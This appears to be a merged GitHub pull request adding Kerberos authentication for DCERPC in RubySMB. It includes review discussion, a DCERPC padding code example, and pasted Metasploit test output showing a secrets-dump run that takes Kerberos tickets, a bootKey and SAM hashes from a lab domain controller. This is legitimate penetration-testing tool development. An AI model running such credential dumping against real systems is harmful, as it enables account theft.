
Enable Kerberos auth for DCERPC #253

Merged
merged 9 commits into from
Oct 25, 2023
Conversation

smashery
Contributor

@smashery smashery commented Oct 3, 2023

This PR supports the kerberos-in-DCSync work in the Metasploit repo (see: rapid7/metasploit-framework#18419). Test cases are listed in that PR, and should exercise all of the changes in this PR.

Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Thanks @smashery for updating the library! This is a great thing, to add support for Kerberos authentication in MSF, awesome work! My only regret is that it is not implemented in RubySMB itself. That would have been even better and many RubySMB users would have benefited from this. But I understand the limitations and all the Kerberos dependencies in MSF.

That being said, I left a few comments for you to review when you get a chance. One main issue I saw during testing was the signature validation. Please, let me know if you have any questions.

@smashery
Contributor Author

Thanks for the review @cdelafuente-r7. Agreed regarding having the Kerberos functionality available here. I wonder whether it would be worth a refactoring job to pull it out into either here, or a separate repo?
I think I've addressed the comments - let me know if there's anything else needed.

@cdelafuente-r7
Contributor

Thanks for updating this @smashery! Everything looks good to me now. I retested and confirmed the signature verification issue is fixed now.
Adding Kerberos functionality would be great, but it would require a lot of refactoring and changes. I think your solution is the best for now. That being said, I'll keep this idea in mind for a future enhancement.

Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Sorry for the last-minute comment before it lands. I just noticed a few comments from last week were not answered yet. Also, I added one more about the padding length calculation logic in the request.

onlyif: -> { has_auth_verifier? },
length: -> { (16 - (stub.num_bytes % 16)) % 16 }

string :auth_pad, onlyif: -> { has_auth_verifier? }
Contributor

@cdelafuente-r7 cdelafuente-r7 Oct 16, 2023


I think I missed this one. Do you think we could use the original implementation here too?

Suggested change
string :auth_pad, onlyif: -> { has_auth_verifier? }
string :auth_pad,
       onlyif: -> { has_auth_verifier? },
       length: -> { calculate_padding_size }
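To show what the padding rule in this thread does on the wire, here is an added example (not RubySMB code): it builds a DCERPC request PDU whose stub is padded with the same `(16 - (len % 16)) % 16` rule as the `length` lambda shown above, records the pad length in the `sec_trailer.auth_pad_length` field as the DCERPC spec requires, and parses such a PDU back, rejecting inconsistent lengths. The header layout follows C706/MS-RPCE; the `calculate_padding_size` body, field values and the sample stub/auth bytes are constructed for illustration.

```ruby
# Constructed example: DCERPC request PDU with an authentication trailer.
# Layout: 16-byte common header, 8 bytes of request fields (alloc_hint,
# p_cont_id, opnum), stub, auth_pad, 8-byte sec_trailer, auth_value.
REQUEST_HEADER_LEN = 24
SEC_TRAILER_LEN = 8

# Same rule as the PR's length lambda: pad the stub so the sec_trailer
# starts 16-byte aligned; an already aligned stub gets no padding.
def calculate_padding_size(stub_len)
  (16 - (stub_len % 16)) % 16
end

def build_request(stub, auth_value, call_id: 1, opnum: 0, auth_type: 9, auth_level: 6, ctx_id: 0)
  pad_len = calculate_padding_size(stub.bytesize)
  frag_len = REQUEST_HEADER_LEN + stub.bytesize + pad_len + SEC_TRAILER_LEN + auth_value.bytesize
  pdu = [5, 0, 0, 0x03].pack('C4')                 # rpc_vers 5.0, ptype REQUEST, first|last frag
  pdu << [0x10, 0, 0, 0].pack('C4')                # drep: little-endian integers, ASCII chars
  pdu << [frag_len, auth_value.bytesize, call_id].pack('vvV')
  pdu << [stub.bytesize, 0, opnum].pack('Vvv')     # alloc_hint, p_cont_id, opnum
  pdu << stub.b << ("\x00" * pad_len).b
  pdu << [auth_type, auth_level, pad_len, 0, ctx_id].pack('C4V') # sec_trailer carries pad length
  pdu << auth_value.b
end

# The receiver does not recompute the padding; it trusts frag_length,
# auth_length and auth_pad_length, so every derived offset is range-checked
# before slicing instead of letting a bad length misalign stub and trailer.
def parse_request(pdu)
  raise ArgumentError, 'short PDU' if pdu.bytesize < REQUEST_HEADER_LEN
  frag_len, auth_len = pdu.byteslice(8, 4).unpack('vv')
  raise ArgumentError, 'frag_length mismatch' unless frag_len == pdu.bytesize
  if auth_len.zero?
    return { stub: pdu.byteslice(REQUEST_HEADER_LEN, frag_len - REQUEST_HEADER_LEN), pad_len: 0, auth_value: nil }
  end
  trailer_off = frag_len - auth_len - SEC_TRAILER_LEN
  raise ArgumentError, 'auth_length too large' if trailer_off < REQUEST_HEADER_LEN
  pad_len = pdu.getbyte(trailer_off + 2)           # sec_trailer.auth_pad_length
  stub_len = trailer_off - REQUEST_HEADER_LEN - pad_len
  raise ArgumentError, 'auth_pad_length exceeds stub area' if stub_len.negative?
  {
    stub: pdu.byteslice(REQUEST_HEADER_LEN, stub_len),
    pad_len: pad_len,
    auth_value: pdu.byteslice(trailer_off + SEC_TRAILER_LEN, auth_len)
  }
end
```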

@smcintyre-r7
Contributor

@cdelafuente-r7 I opened a PR implementing the changes you requested here: smashery#1. Give it a look and let me know what you think.

@smcintyre-r7
Contributor

Tested this with the Metasploit side of things and it's all looking good to me now!

Thanks for your work on this Smashery, this is a great improvement!

msf6 auxiliary(gather/windows_secrets_dump) > run DOMAIN=msflab.local SMB::Auth=kerberos SMB::Rhostname=dc.msflab.local DomainControllerRhost=192.168.159.10
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_191490.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_964676.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Retrieving target system bootKey
[+] 192.168.159.10:445 - bootKey: 0x369c37bc5ec5e4b3eaeee7b69caf5d6a
[*] 192.168.159.10:445 - Saving remote SAM database
[*] 192.168.159.10:445 - Dumping SAM hashes
[*] 192.168.159.10:445 - Password hints:
No users with password hints on this system
[*] 192.168.159.10:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
... cut because secrets

@smcintyre-r7 smcintyre-r7 merged commit 53383ca into rapid7:master Oct 25, 2023
6 checks passed